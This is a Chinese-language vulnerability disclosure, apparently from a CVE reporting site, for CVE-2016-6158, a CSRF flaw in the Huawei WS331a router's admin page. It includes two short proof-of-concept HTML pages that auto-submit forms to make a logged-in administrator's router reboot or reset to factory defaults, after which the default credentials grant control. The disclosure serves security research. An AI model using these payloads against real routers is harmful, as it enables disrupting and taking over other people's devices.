CVE中文申请站

一、漏洞摘要

漏洞名称: 华为WS331a产品管理页面存在CSRF漏洞
上报日期: 2016-09-07
漏洞发现者: zixian(me@zixian.org)
产品首页: http://www.huawei.com/
软件链接: http://www.huawei.com/
版本: WS331a-10 V100R001C02B017SP01及之前版本
CVE编号: CVE-2016-6158


二、漏洞概述

华为WS331a 是一款便携无线路由器。
WS331a产品的管理页面中存在一个CSRF漏洞,未经过认证的攻击者可以利用此漏洞发起CSRF攻击。成功利用此漏洞,攻击者可以向受影响设备提交特定请求进而导致设备恢复出厂设置或者重启。 (漏洞编号:HWPSIRT-2016-07078)
此漏洞的CVE编号为:CVE-2016-6158。


三、利用代码

当管理员登陆后,打开如下poc页面,WS331a设备将重启。
poc.html:

<form action="http://192.168.3.1/api/service/reboot.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script>

当管理员登陆后,打开如下poc页面,WS331a设备将恢复初始化配置。设备自动重启后不需要密码即可连接热点,并使用amdin/admin对设备进行管理控制。

<form action="http://192.168.3.1/api/service/restoredefcfg.cgi" method="post">
</form>
<script> document.forms[0].submit(); </script> 


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/20/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6158
华为官方:http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20160907-01-ws331a-en

标签: none